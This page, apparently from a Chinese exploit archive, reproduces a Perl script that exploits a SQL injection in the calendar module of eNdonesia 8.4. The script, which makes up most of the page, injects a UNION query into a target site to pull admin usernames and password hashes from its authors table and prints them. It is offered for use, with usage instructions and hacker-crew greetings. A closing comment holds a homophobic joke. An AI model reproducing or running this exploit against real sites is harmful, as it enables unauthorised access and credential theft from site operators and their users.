eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit

所属分类：网络安全 / Exploit 阅读数： 105

收藏 0赞 0分享

#!/usr/bin/perl
#/-----------------------------------------------\
#| /-----------------------------------------\ |
#| | Remote SQL Exploit | |
#| | eNdonesia 8.4 Remote SQL Exploit | |
#| | www.endonesia.org | |
#| | Calendar Module | |
#| \-----------------------------------------/ |
#| /-----------------------------------------\ |
#| | Presented By Jack | |
#| | MainHack Enterprise | |
#| | www.MainHack.com & irc.nob0dy.net | |
#| | #MainHack #nob0dy #BaliemHackerlink | |
#| | Jack[at]MainHack[dot]com | |
#| \-----------------------------------------/ |
#| /-----------------------------------------\ |
#| | Hello To: Indonesian h4x0r | |
#| | yadoy666,n0c0py & okedeh | |
#| | VOP Crew [Vaksin13,OoN_BoY,Paman] | |
#| | NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull | |
#| | all MainHack BrotherHood | |
#| \-----------------------------------------/ |
#\-----------------------------------------------/

use HTTP::Request;
use LWP::UserAgent;

$sql_vulnerable = "/mod.php?mod=calendar&op=list_events&loc_id=";
$sql_injection = "-999/**/union select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where name pwd";

if(!@ARGV) { &help;exit(1);}

sub help(){
print "\n [?] eNdonesia 8.4 Remote SQL Exploit\n";
print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print " [?] Use : perl $0 www.target.com\n";
print " [?] Dont use \"http://\"\n";
print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print " [?] Baliem Hacker - VOP crew - MainHack BrotherHood \n\n";
print " [?] www.MainHack.com\n\n";
}

while (){
my $target = $ARGV[0];
my $exploit = "http://".$target.$sql_vulnerable.$sql_injection;
print "\n [-] Trying to inject $target ...\n\n";
my $request = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request);
if ($response->is_success){
my $res = $response->content;
if ($res =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {
my ($username,$passwd) = ($1,$2);
print " [target] $target \n";
print " [loginx] $username:$passwd \n\n";
exit(0);
}
else {
die " [error] Fail to get username and password.\n\n";
}
}
else {
die " [error] Fail to inject $target \n\n";
}
}

#/----------------------------------------------------------------\
#| NoGay kalo kita artikan sepintas berarti Tidak ada Gay |
#| namun mari kita perhatikan secara seksama ... |
#| NoGay merupakan kependekan dari NoGe is Gay. |
#| Sungguh, penyembunyian sebuah karakter di balik makna kata. |
#\----------------------------------------------------------------/
#Vendor Has been contacted and now working for it.

更多精彩内容其他人还在看

eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit

Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit

WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit

Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC

Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit

Simple DNS Plus

NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit

Pligg

CoolPlayer m3u File Local Buffer Overflow Exploit

eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit

HIOX Random Ad 1.3 Arbitrary Add Admin User Exploit

网络赚钱

站长故事